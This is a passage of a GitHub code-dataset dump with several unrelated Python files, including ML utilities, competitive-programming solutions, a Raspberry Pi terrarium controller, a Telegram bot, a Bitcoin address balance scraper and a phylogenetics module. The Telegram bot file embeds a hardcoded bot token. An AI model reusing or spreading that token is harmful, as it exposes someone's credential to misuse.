self.model\r\n","repo_name":"xiyie/yolox","sub_path":"test/exp/yolox_base.py","file_name":"yolox_base.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"39935198465","text":"n,m = [int(x) for x in input().split()]\n\nadj = [[] for _ in range(n + 1)]\nfor _ in range(m):\n\tu, v = [int(x) for x in input().split()]\n\tadj[u].append(v)\n\tadj[v].append(u)\n\n\n\nring = True\nfor x in adj[1:n+1]:\n\tif len(x) != 2:\n\t\tring = False\n\nlargest = len(adj[1])\nfor x in adj[1:n+1]:\n\tif len(x)>=largest:\n\t\tlargest = len(x)\nvisited = [False for i in range(n+1)]\nparent = [-1 for i in range(n+1)]\nstack = []\nstack.append(1)\nparent[1] = None\ncycle=False\n\nwhile (len(stack)):\n\ts = stack[-1]\n\tstack.pop()\n\tvisited[s] = True\n\tfor node in adj[s]:\n\t\tif (not visited[node]):\n\t\t\tstack.append(node)\n\t\t\tparent[node] = s\n\t\telif parent[s]!=node:\n\t\t\tcycle=True\n\nif ring and cycle:\n\tprint(\"ring topology\")\nelse:\n\tdistance = [-1 for _ in range(n + 1)]\n\tdistance[1] = 0\n\tshortest_path_tree_parent = [-1 for _ in range(n + 1)]\n\tqueue = [1]\n\tfor u in queue:\n\t\tfor v in adj[u]:\n\t\t\tif distance[v] == -1:\n\t\t\t\tdistance[v] = distance[u] + 1\n\t\t\t\tshortest_path_tree_parent[v] = u\n\t\t\t\tqueue.append(v)\n\t\n\tif largest==2:\n\t\tprint(\"bus topology\")\n\telse:\n\t\tif distance[n]<=2 and largest==n-1 and not cycle:\n\t\t\tprint(\"star topology\")\n\t\telse:\n\t\t\tprint(\"unknown topology\")\n\t\t\t\n\t\n\n","repo_name":"LamberlainMuli/CompetitiveProgramming","sub_path":"Progvar/AP CSCI 21 2022/Week 5/CF292B.py","file_name":"CF292B.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"3283889226","text":"import cv2\nimport torchvision.models as models\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport cv2\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.transforms as tt\n\nmodel_state = torch.load('models/facial_expression.pth')\nclass_labels = ['Angry', 'Disgust', 'Fear', 'Happy', 'Sad', 'Surprise', 'Neutral']\n#class_to_label = {0 :'Angry', 1 : 'Disgust', 2:'Fear', 3 :'Happy', 4:'Sad', 5:'Surprise', 6:'Neutral'}\nface_classifier = cv2.CascadeClassifier(\"models/haarcascade_frontalface_default.xml\")\n\nclass SeparableConv2d(nn.Module):\n\n def __init__(self, in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False):\n super(SeparableConv2d, self).__init__()\n self.depthwise = nn.Conv2d(in_channels, in_channels, kernel_size, stride, padding, dilation, groups=in_channels,\n bias=bias)\n self.pointwise = nn.Conv2d(in_channels, out_channels, 1, 1, 0, 1, 1, bias=bias)\n\n def forward(self, x):\n x = self.depthwise(x)\n x = self.pointwise(x)\n return x\n\n\nclass ResidualBlock(nn.Module):\n\n def __init__(self, in_channeld, out_channels):\n super(ResidualBlock, self).__init__()\n\n self.residual_conv = nn.Conv2d(in_channels=in_channeld, out_channels=out_channels, kernel_size=1, stride=2,\n bias=False)\n self.residual_bn = nn.BatchNorm2d(out_channels, momentum=0.99, eps=1e-3)\n\n self.sepConv1 = SeparableConv2d(in_channels=in_channeld, out_channels=out_channels, kernel_size=3, bias=False,\n padding=1)\n self.bn1 = nn.BatchNorm2d(out_channels, momentum=0.99, eps=1e-3)\n self.relu = nn.ReLU()\n\n self.sepConv2 = SeparableConv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=3, bias=False,\n padding=1)\n self.bn2 = nn.BatchNorm2d(out_channels, momentum=0.99, eps=1e-3)\n self.maxp = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n def forward(self, x):\n res = self.residual_conv(x)\n res = self.residual_bn(res)\n x = self.sepConv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.sepConv2(x)\n x = self.bn2(x)\n x = self.maxp(x)\n return res + x\n\n\nclass FaceCnnModel(nn.Module):\n\n def __init__(self, in_channels, num_classes):\n super().__init__()\n\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=8, kernel_size=3, stride=1, bias=False)\n self.bn1 = nn.BatchNorm2d(8, affine=True, momentum=0.99, eps=1e-3)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(in_channels=8, out_channels=8, kernel_size=3, stride=1, bias=False)\n self.bn2 = nn.BatchNorm2d(8, momentum=0.99, eps=1e-3)\n self.relu2 = nn.ReLU()\n\n self.module1 = ResidualBlock(in_channeld=8, out_channels=16)\n self.module2 = ResidualBlock(in_channeld=16, out_channels=32)\n self.module3 = ResidualBlock(in_channeld=32, out_channels=64)\n self.module4 = ResidualBlock(in_channeld=64, out_channels=128)\n\n self.last_conv = nn.Conv2d(in_channels=128, out_channels=7, kernel_size=3, padding=1)\n self.avgp = nn.AdaptiveAvgPool2d((1, 1))\n\n def forward(self, input):\n x = input\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu1(x)\n x = self.conv2(x)\n x = self.bn2(x)\n x = self.relu2(x)\n x = self.module1(x)\n x = self.module2(x)\n x = self.module3(x)\n x = self.module4(x)\n x = self.last_conv(x)\n x = self.avgp(x)\n x = x.view((x.shape[0], -1))\n return x\n\n\nmodel = FaceCnnModel(1,len(class_labels))\nmodel.load_state_dict(model_state)\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n # Grab a single frame of video\n ret, frame = cap.read()\n #frame = cv2.flip(frame, 1)\n labels = []\n gray = 
cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n faces = face_classifier.detectMultiScale(gray, 1.3, 5)\n\n for (x,y,w,h) in faces:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_gray = cv2.resize(roi_gray,(48, 48), interpolation=cv2.INTER_AREA)\n\n if np.sum([roi_gray])!= 0:\n roi = tt.functional.to_pil_image(roi_gray)\n roi = tt.functional.to_grayscale(roi)\n roi = tt.ToTensor()(roi).unsqueeze(0)\n\n # make a prediction on the ROI\n tensor = model(roi)\n pred = torch.max(tensor, dim=1)[1].tolist()\n label = class_labels[pred[0]]\n \n label_position = (x, y)\n cv2.putText(frame, label, label_position, cv2.FONT_HERSHEY_COMPLEX, 2, (0, 255, 0), 3)\n else:\n cv2.putText(frame, 'No Face Found', (20, 60), cv2.FONT_HERSHEY_COMPLEX, 2, (0, 255, 0), 3)\n \n cv2.imshow('Emotion Detector', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"AayushBangroo/facialExpression","sub_path":"face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":5023,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"6002301011","text":"# Need to install first (if some packages have not been installed previously)\n# >> python3 -m pip install beautifulsoup4\n# or\n# >> pip install beautifulsoup4\n# \n# >> python3 -m pip install lxml\n# or\n# >> pip install lxml\n\nfrom bs4 import BeautifulSoup\nimport csv\n\ntry:\n fileName = \"text_5_var_12\"\n with open(\"assets/data/5/\"+fileName, encoding=\"utf-8\", mode=\"r\") as htmlFile:\n reader = htmlFile.read()\n htmlParse = BeautifulSoup(reader, 'lxml') \n tableBody = htmlParse.find('table')\n tableRows = tableBody.find_all('tr')\n allData = []\n\n for row in tableRows:\n tableCols = row.find_all('td') or row.find_all('th')\n data = (tableCols[0].text, tableCols[1].text, tableCols[2].text, tableCols[3].text, tableCols[4].text)\n allData.append(data)\n \n with open(\"assets/result/5/\"+fileName+\"_result.csv\", 'w', newline='') as csvfile:\n writerCsv = csv.writer(csvfile, delimiter=',')\n for data in allData:\n writerCsv.writerow([data[0]] + [str(data[1])] + [data[2]] + [data[3]] + [data[4]])\n \nexcept Exception as e:\n print(e)","repo_name":"kuldii/my_first_pyton","sub_path":"lib/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5685397542","text":"from keras.models import Model\n\n\ndef lock_layers(model, indices):\n \"\"\"Locks layers on respective indices from indices array\"\"\"\n for i in indices:\n model.layers[i].trainable = False\n return model\n\n\ndef prepare_feature_extractor(model,\n crop_index,\n lock_index,\n input_shape):\n \"\"\"Crops model and locks layers from training\n Manipulates model config since it is only viable option besides rebuilding the whole model\n Receives:\n model - pretrained model\n crop_index - index of last layer in final model\n lock_index - index of last locked layer in final model\n input_shape - since model is convolutional, input could be freely changed\n Returns:\n new cropped model\n \"\"\"\n config = model.get_config()\n weights = model.get_weights()\n # Edit input layer\n config['layers'][0]['config']['batch_input_shape'] = (None, *input_shape)\n\n # Crop unnecessary layers\n assert crop_index < len(config['layers']), 'crop_index is out of layers list bounds'\n config['layers'] = config['layers'][:crop_index + 1]\n\n # Assign new model output\n config['layers'][-1]['config']['name'] = 'FeatureMap'\n config['output_layers'][0][0] = config['layers'][-1]['name']\n\n # Build cropped model from config and load weights\n model = Model.from_config(config)\n model.set_weights(weights)\n\n # Lock layers\n assert lock_index < len(config['layers']), 'lock_index is out of cropped layers list bounds'\n return lock_layers(model, list(range(lock_index + 1)))","repo_name":"bmstu-iu8-g1-2019-project/road-signs-recognition","sub_path":"sources/feature_extractor/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5562962140","text":"import webiopi\nimport datetime\n#import Adafruit_DHT as dht\nimport sys\n\nGPIO = webiopi.GPIO\n\nVDHT = 6\nDth = 19\nPluz= 17\nPcascada = 27\nPlluvia = 12\nPcalefactor = 13\nPpeltier = 14\nTmin=22\nTmax=28\nHmin=100\nHmax=0\nHoraLuzOn = 9 # Turn Light ON at 08:00\nHoraLuzOff = 20 # Turn Light OFF at 18:00\nt = 1\nh = 2\nAUTO = True\nTemperaturaElevada = 0\n\n# setup function is automatically called at WebIOPi startup\ndef setup():\n # set the GPIO used by the light to output\n GPIO.setFunction(VDHT, GPIO.OUT) #pin 6 5V DHT\n GPIO.setFunction(Pluz, GPIO.OUT)\n GPIO.setFunction(Pcascada, GPIO.OUT)\n GPIO.setFunction(Plluvia, GPIO.OUT)\n GPIO.setFunction(Pcalefactor, GPIO.OUT)\n GPIO.setFunction(Ppeltier, GPIO.OUT)\n\n GPIO.digitalWrite(VDHT, GPIO.HIGH) #pin 6 5V DHT\n GPIO.digitalWrite(Pcascada, GPIO.LOW)\n GPIO.digitalWrite(Plluvia, GPIO.HIGH)\n GPIO.digitalWrite(Pcalefactor, GPIO.HIGH)\n GPIO.digitalWrite(Pluz, GPIO.HIGH)\n GPIO.digitalWrite(Ppeltier, GPIO.HIGH)\n\n\n hora = datetime.datetime.now()\n\n if ((hora.hour >= HoraLuzOn) and (hora.hour < HoraLuzOff)):\n GPIO.digitalWrite(Pluz, GPIO.HIGH)\n\n# loop function is repeatedly called by WebIOPi \ndef loop():\n hora = datetime.datetime.now()\n if (AUTO):\n\n # toggle light ON all days at the correct time\n if ((hora.hour == HoraLuzOn) and (hora.minute == 0) and (hora.second == 0)):\n if (GPIO.digitalRead(Pluz) == GPIO.LOW):\n GPIO.digitalWrite(Pluz, GPIO.HIGH)\n\n # toggle light OFF\n if ((hora.hour == HoraLuzOff) and (hora.minute == 0) and (hora.second == 0)):\n if (GPIO.digitalRead(Pluz) == GPIO.HIGH):\n GPIO.digitalWrite(Pluz, GPIO.LOW)\n\n #h,t = dht.read_retry(dht.DHT22, Dth)\n h=1\n t=25\n if tTmax:\n if (GPIO.digitalRead(Pcalefactor) == GPIO.LOW):\n GPIO.digitalWrite(Pcalefactor, GPIO.HIGH)\n if t>30:\n TemperaturaElevada = 1\n if (t<28) and (TemperaturaElevada == 1):\n TemperaturaElevada = 0 \n\n if (hora.hour==10 and hora.minute==50) or (hora.hour==12 and hora.minute==0) or (hora.hour==13 and hora.minute==50) or (hora.hour==16 and hora.minute==50) or (hora.hour==19 and hora.minute==50) or (hora.hour==22 and hora.minute==50):\n GPIO.digitalWrite(Plluvia, GPIO.LOW)\n time.sleep(30)\n GPIO.digitalWrite(Plluvia, GPIO.HIGH)\n if (TemperaturaElevada):\n GPIO.digitalWrite(Ppeltier, GPIO.LOW)\n\n\n # gives CPU some time before looping again\n webiopi.sleep(1)\n\n# destroy function is called at WebIOPi shutdown\ndef destroy():\n GPIO.digitalWrite(Pluz, GPIO.LOW)\n GPIO.digitalWrite(Pcascada, GPIO.LOW)\n GPIO.digitalWrite(Plluvia, GPIO.HIGH)\n GPIO.digitalWrite(Pcalefactor, GPIO.HIGH)\n GPIO.digitalWrite(Pluz, GPIO.HIGH)\n GPIO.digitalWrite(peltier, GPIO.HIGH)\n\n@webiopi.macro\ndef getTemperaturaHumedad():\n return \"%d;%d\" % (t, h)\n\n@webiopi.macro\ndef getLuzHours():\n return \"%d;%d\" % (HoraLuzOn, HoraLuzOff)\n\n@webiopi.macro\ndef setLuzHours(on, off):\n global HoraLuzOn, HoraLuzOff\n HoraLuzOn = int(on)\n HoraLuzOff = int(off)\n return getLuzHours()\n\n@webiopi.macro\ndef getTemperaturaLimits():\n return \"%d;%d\" % (Tmin, Tmax)\n\n@webiopi.macro\ndef setTemperaturaLimits(on, off):\n global Tmin, Tmax\n Tmin = int(on)\n Tmax = int(off)\n return getTemperaturaLimits()\n\n@webiopi.macro\ndef getModo():\n if (AUTO):\n return \"auto\"\n return \"manual\"\n\n@webiopi.macro\ndef setModo(modo):\n global AUTO\n if (mode == \"auto\"):\n AUTO = True\n elif (mode ==\"manual\"):\n AUTO = FALSE\n return 
getModo()\n","repo_name":"aguspa/TerrarioAutonomo","sub_path":"python/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39522186624","text":"import requests\nimport time\nimport urllib\nimport ganster\n\n\nTOKEN = \"1060340522:AAHwgNAwVqc2ONPtzQX0TPvQjnFOss67xHA\"\nURL = f\"https://api.telegram.org/bot{TOKEN}/\"\n\n\ndef get_updates(offset=None):\n url = URL + \"getUpdates?timeout=100\"\n if offset:\n url = url + f\"&offset={offset}\"\n response = requests.get(url)\n js = response.json()\n return js\n\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates[\"result\"]:\n update_ids.append(int(update[\"update_id\"]))\n return max(update_ids)\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates[\"result\"])\n last_update = num_updates - 1\n text = updates[\"result\"][last_update][\"message\"][\"text\"]\n chat_id = updates[\"result\"][last_update][\"message\"][\"chat\"][\"id\"]\n return text, chat_id\n\n\ndef reply_message(updates):\n for update in updates[\"result\"]:\n text = update[\"message\"][\"text\"]\n chat = update[\"message\"][\"chat\"][\"id\"]\n reply = ganster.reply_message(text)\n send_message(reply, chat)\n\n\ndef send_message(text, chat_id):\n text = urllib.parse.quote_plus(text)\n url = URL + f\"sendMessage?text={text}&chat_id={chat_id}\"\n requests.get(url)\n\n\ndef main():\n last_update_id = None\n while True:\n updates = get_updates(last_update_id)\n if len(updates[\"result\"]) > 0:\n last_update_id = get_last_update_id(updates) + 1\n reply_message(updates)\n time.sleep(0.5)\n\n\nif __name__ == '__main__':\n main()","repo_name":"Husainraza/Chatbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13917475424","text":"import subprocess\nimport os\n\nmy_env = os.environ.copy()\n# command = [\"helm\", \"install\", \"--name\", \"spark-user-\" + os.environ['USER'], \"--set\", \"user.name=\" + os.environ['USER'], \"--set\", \"cvmfs.enable=true\", \"--set\" , \"user.admin=false\", \"https://gitlab.cern.ch/db/spark-service/spark-service-charts/raw/spark_user_accounts/cern-spark-user-1.1.0.tgz\"]\n# command = [\"openstack\", \"token\", \"issue\", \"-c\", \"id\", \"-f\", \"value\"]\ncommand = [\"helm\", \"init\", \"--client-only\"]\np = subprocess.Popen(command, stdout=subprocess.PIPE, env=my_env)\nout, err = p.communicate()\nprint(out)\nprint(err)\n","repo_name":"sahiljajodia01/k8s-selection","sub_path":"k8s-selection/helm_chart_test.py","file_name":"helm_chart_test.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"24510966989","text":"import heapq\n\nN = int(input())\nxy = []\nfor n in range(N):\n x, y = map(float, input().split())\n xy.append([x, y])\n\ngraph = [[] for _ in range(N)]\nfor i in range(N):\n for j in range(i + 1, N):\n cost = ((xy[i][0] - xy[j][0]) ** 2 + (xy[i][1] - xy[j][1]) ** 2) ** 0.5\n graph[i].append((cost, j))\n graph[j].append((cost, i))\n\nq = [(0, 0)]\nvisited = [0] * N\nans = 0\nwhile q:\n cost, now = heapq.heappop(q)\n if not visited[now]:\n visited[now] = 1\n ans += cost\n for next in graph[now]:\n heapq.heappush(q, (next[0], next[1]))\nprint(round(ans, 2))","repo_name":"dhkimxx/Baekjoon","sub_path":"python/4386.py","file_name":"4386.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30718653156","text":"# -*-coding:utf-8 -*-\nimport requests\n\ndef is_zero_balance(balance):\n balance_float = 0.0\n if isinstance(balance, str):\n print(\"balance:{}\".format(balance))\n if len(balance) > 0:\n balance_float = float(balance)\n else:\n balance_float = balance\n \n return balance_float > 0\n\ndef get_bitcoin_balance(address):\n # 拼接链接\n url = \"\".join([\"https://www.blockchain.com/btc/address/\", address])\n response = requests.get(url)\n key_word = \"The current value of this address is\"\n key_len = len(key_word)\n text = response.text\n index = text.find(key_word)\n if index < 0:\n print(\"text:{} index: {} -----------can not find index-----------\".format(text,index))\n return 0;\n short = text[index:index+100]\n btc = short.find(\"BTC\")\n if btc < 0:\n print(\"******can not find btc******\")\n return 0;\n else:\n btc_banlance = short[key_len+1:btc-1]\n return btc_banlance\n\nif __name__ == \"__main__\":\n try:\n address = \"3JZHLAKwc291dnxjwLyDDfnmQkbTNwC7PX\"\n # address = \"bc1qcn6xjvfy6uqyqqnzmwxeqqtnk9cmtcpummn8la\"\n # address = \"36KKMy5yihkjNA4Rc21eA5TXy4wnfCGpj3\"\n btc_banlance = get_bitcoin_balance(address)\n \n if is_zero_balance(btc_banlance):\n print(\"find valide adress:\" + address)\n else:\n print(\"continu find!\")\n \n except Exception as err:\n print(\"error, \" + err)\n\n\n\n\n\n","repo_name":"wodingdong/genbtcaccount","sub_path":"genbtcaddr/get_bitcoin.py","file_name":"get_bitcoin.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"69"}
+{"seq_id":"74433518299","text":"__author__ = \"Andrea Rubbi\"\r\n\r\n# ─── About ────────────────────────────────────────────────────────────────────\r\n\"\"\"This file defines the tree_set and set_collection classes.\r\n tree_set contains the information relative to a single set of phyogenetic trees\r\n in newick format. It allows to compute the distance matrix using different methods and metrics.\r\n The distance matrix can be then embedded using different methods and subsequently plotted in 2D or 3D.\r\n A distance matrix and metadata can be given as .csv files. Moreover, metadata is modified\r\n in order to give information regarding the name of the tree set and the index (or step) of each tree.\r\n Please note that, once an instance of a class is generated, its metadata dataframe should not be substituted\r\n as this would invalidate it for the plotting functions. Addition of columns and features is possible by\r\n accessing the dataframe and modifying it as a pandas.DataFrame instance.\r\n set_collection behaves similarly to set_collection. Matter of fact, it is a subclass of the latter and therefore\r\n shares most of its methods. Its purpose is to analyze concurrently multiple instances of tree_sets and plot their\r\n relative distance in a common embedding. Examples of possible applications are present at: ###LINK###\"\"\"\r\n# ──────────────────────────────────────────────────────────────────────────────\r\n\r\n__copyright__ = \"2023-present Andrea Rubbi and other contributors\"\r\n__credits__ = [\"Andrea Rubbi\", \"Lukas Weilguny\", \"Nick Goldman\", \"Nicola de Maio\"]\r\n\r\n__license__ = \"MIT\"\r\n__maintainer__ = \"Andrea Rubbi\"\r\n__institute__ = \"EMBL-EBI\"\r\n__email__ = \"andrear@ebi.ac.uk\"\r\n__status__ = \"Production\"\r\n\r\n# ──────────────────────────────────────────────────────────────────────────────\r\nimport os\r\nimport random\r\nimport shutil\r\nimport subprocess\r\nimport sys\r\nimport time\r\nimport uuid\r\nimport warnings\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom rich import print\r\n# ? rich is a very nice library that allows to\r\n# ? easily format the output of console\r\n# ? 
https://github.com/Textualize/rich\r\nfrom rich.console import Console\r\n\r\n# getting the name of the directory\r\ncurrent = os.path.dirname(os.path.realpath(__file__))\r\n\r\n# Getting the parent directory name\r\nparent = os.path.dirname(current)\r\n\r\n# adding the parent directory to\r\n# the sys.path.\r\nsys.path.append(parent)\r\n\r\n# silencing some warnings\r\nfrom scipy.sparse import SparseEfficiencyWarning\r\n\r\n# importing other modules\r\n# try:\r\nfrom .calculate_distances import hashrf, maple_RF, tqdist\r\nfrom .embeddings import Isomap_e, LLE_e, PCA_e, tSNE_e\r\nfrom .embeddings.graph import graph\r\nfrom .interactive_mode import interactive\r\nfrom .subsample import subsample\r\n\r\n# except:\r\n# sys.exit(\"Error\")\r\n\r\n\r\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\r\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\r\nwarnings.filterwarnings(\"ignore\", category=SparseEfficiencyWarning)\r\n\r\n\r\n# ────────────────────────────────────────────────────────── TREE_SET CLASS ─────\r\nclass tree_set:\r\n \"\"\"Class for the analysis of a set of phylogenetic trees\"\"\"\r\n\r\n # Console from rich -> takes control of console output\r\n console = Console()\r\n\r\n # ─── INIT ──────────────────────────────────────────────────────────────────\r\n def __init__(self, file, output_file=None, distance_matrix=None, metadata=None):\r\n \"\"\"Initialize tree_set\r\n\r\n file: mandatory - file with set of phylogenetic trees in newick format\r\n output_file: facultative - specifies output_file of distance matrix\r\n distance_matrix: facultative - specifies file with already-computed distance matrix\r\n metadata: facultative - specifies file containing additional information for each tree in set.\r\n It should contain a column for each feature, a row for each tree (blank row if no info)\r\n \"\"\"\r\n\r\n self.file = file\r\n self.output_file = output_file\r\n self.distance_matrix = distance_matrix\r\n self.metadata = metadata\r\n self.embedding_pca2D = None\r\n self.embedding_tsne2D = None\r\n self.embedding_pca3D = None\r\n self.embedding_tsne3D = None\r\n\r\n if self.output_file == None:\r\n self.output_file = \"./{file}_distance_matrix.csv\".format(\r\n file=os.path.splitext(os.path.basename(self.file))[0]\r\n )\r\n\r\n self.size = int(f\"{os.path.getsize(file)/(1<<30):,.0f}\")\r\n # if self.size > 3: sys.exit(f'File is too large: {self.size} GB')\r\n\r\n try:\r\n self.n_trees = int(\r\n subprocess.check_output([\"wc\", \"-l\", self.file]).decode().split(\" \")[0]\r\n )\r\n except:\r\n with open(file, \"r\") as f:\r\n self.n_trees = len(f.readlines())\r\n f.close()\r\n\r\n if type(self.distance_matrix) != type(None):\r\n try:\r\n self.distance_matrix = pd.read_csv(\r\n self.distance_matrix, header=None, index_col=None\r\n ).values\r\n # header=0,\r\n # index_col=0,\r\n # dtype=np.float32,\r\n # self.distance_matrix.columns = list(range(self.distance_matrix.shape[1]))\r\n except:\r\n sys.exit(\r\n \"There's an error with the Distance Matrix file - please check the correct location and name of the .csv file\"\r\n )\r\n\r\n if type(self.metadata) != type(None):\r\n try:\r\n self.metadata = pd.read_csv(self.metadata)\r\n except:\r\n sys.exit(\r\n \"There's an error with the Metadata file - please check the correct location and name of the .csv file\"\r\n )\r\n\r\n else:\r\n self.metadata = pd.DataFrame()\r\n self.metadata[\"SET-ID\"] = [\r\n os.path.splitext(os.path.basename(self.file))[0] for i in range(self.n_trees)\r\n ]\r\n self.metadata[\"STEP\"] 
= [i for i in range(self.n_trees)]\r\n self.sets = np.unique(self.metadata[\"SET-ID\"])\r\n\r\n # ─── STR ───────────────────────────────────────────────────────────────────\r\n def __str__(self):\r\n \"\"\"Returns string representation of tree_set\r\n\r\n Returns:\r\n __str__: summary of tree_set\r\n \"\"\"\r\n computed = \"not computed\"\r\n if type(self.distance_matrix) != type(None):\r\n computed = \"computed\"\r\n\r\n return f\"─────────────────────────────\\n Tree set containing {self.n_trees} trees;\\n File: {self.file};\\n Distance matrix: {computed}.\\n───────────────────────────── \\n\"\r\n\r\n # ─── CALCULATE DISTANCES ───────────────────────────────────────────────────\r\n def calculate_distances(self, method):\r\n \"\"\"Computes tree_set distance matrix with method of choice\r\n\r\n Args:\r\n method (str): method/algorithm used to compute distance matrix\r\n \"\"\"\r\n methods = {\r\n \"hashrf_RF\": hashrf.hashrf,\r\n \"hashrf_wRF\": hashrf.hashrf_weighted,\r\n \"smart_RF\": maple_RF.calculate_distance_matrix,\r\n \"tqdist_quartet\": tqdist.quartet,\r\n \"tqdist_triplet\": tqdist.triplet,\r\n \"None\": None,\r\n }\r\n\r\n with self.console.status(\"[bold green]Calculating distances...\") as status:\r\n self.distance_matrix = methods[method](\r\n self.file, self.n_trees, self.output_file\r\n )\r\n print(f\"[bold blue]{method} | Done!\")\r\n\r\n # ─── EMBED ─────────────────────────────────────────────────────────────────\r\n def embed(self, method, dimensions, quality=False, report=False):\r\n \"\"\"Compute embedding with n-dimensions and method of choice\r\n\r\n Args:\r\n method (str): method of choice to embed data\r\n dimensions (_type_): number of dimensions/components\r\n quality (bool, optional): returns quality report and self.emb_quality. 
Defaults to False.\r\n \"\"\"\r\n methods = {\r\n \"pca\": PCA_e.pca,\r\n \"tsne\": tSNE_e.tsne,\r\n \"isomap\": Isomap_e.isomap,\r\n \"lle\": LLE_e.lle,\r\n \"None\": None,\r\n }\r\n\r\n if type(self.distance_matrix) == type(None):\r\n self.calculate_distances(\"hashrf_RF\")\r\n\r\n dim = dimensions if dimensions > 2 else 3\r\n\r\n with self.console.status(\"[bold green]Embedding distances...\") as status:\r\n embedding = methods[method](\r\n self.distance_matrix,\r\n dim,\r\n self.metadata,\r\n quality=quality if not report else True,\r\n report=report,\r\n )\r\n print(f\"[bold blue]{method} | Done!\")\r\n\r\n if quality:\r\n if method == \"pca\":\r\n embedding, var, corr, self.emb_quality = embedding\r\n print(\r\n f\"With {dimensions} components/dimensions, the explained variance is {var:.2f},\\n with an estimated correlation {corr[0, 1]:.2f} with the {self.n_trees}-dimensional coordinates\"\r\n )\r\n else:\r\n embedding, corr, self.emb_quality = embedding\r\n print(\r\n f\"With {dimensions} components/dimensions, the estimated correlation with the {self.n_trees}-dimensional coordinates is {corr[0, 1]:.2f}\"\r\n )\r\n\r\n if method == \"pca\":\r\n self.embedding_pca = embedding\r\n self.embedding_pca3D = embedding[:, :4]\r\n self.embedding_pca2D = embedding[:, :3]\r\n\r\n elif method == \"tsne\":\r\n if dimensions > 3:\r\n warnings.warn(\r\n \"t-SNE with more than 3 dimensions can be considerably slow\"\r\n )\r\n self.embedding_tsne = embedding\r\n self.embedding_tsne3D = embedding[:, :4]\r\n self.embedding_tsne2D = embedding[:, :3]\r\n\r\n elif method == \"isomap\":\r\n if dimensions > 3:\r\n warnings.warn(\r\n \"Isomap with more than 3 dimensions can be considerably slow\"\r\n )\r\n self.embedding_isomap = embedding\r\n self.embedding_isomap3D = embedding[:, :4]\r\n self.embedding_isomap2D = embedding[:, :3]\r\n\r\n elif method == \"lle\":\r\n if dimensions > 3:\r\n warnings.warn(\"LLE with more than 3 dimensions can be considerably slow\")\r\n self.embedding_lle = embedding\r\n self.embedding_lle3D = embedding[:, :4]\r\n self.embedding_lle2D = embedding[:, :3]\r\n\r\n # ─── PLOT EMBEDDING ─────────────────────────────────────────────────────────\r\n\r\n def plot_2D(\r\n self,\r\n method,\r\n save=False,\r\n name_plot=None,\r\n static=False,\r\n plot_meta=\"SET-ID\",\r\n plot_set=None,\r\n select=False,\r\n same_scale=False,\r\n ):\r\n \"\"\"Plot 2D embedding performed with method of choice\r\n\r\n Args:\r\n method (str): embedding method\r\n save (bool, optional): save plot HTML. Defaults to False.\r\n name_plot (str, optional): name of plot's file. Defaults to None.\r\n static (bool, optional): return less interactive plot. Defaults to False.\r\n plot_meta (str, optional): meta-variale used to color the points. Defaults to \"SET-ID\".\r\n plot_set (list, optional): list of sets to plot from set_collection. Defaults to None.\r\n select (bool, optional): return set of buttons to show or hide specific traces. Defaults to False.\r\n same_scale (bool, optional): use same color_scale for all traces when scale is continuous. 
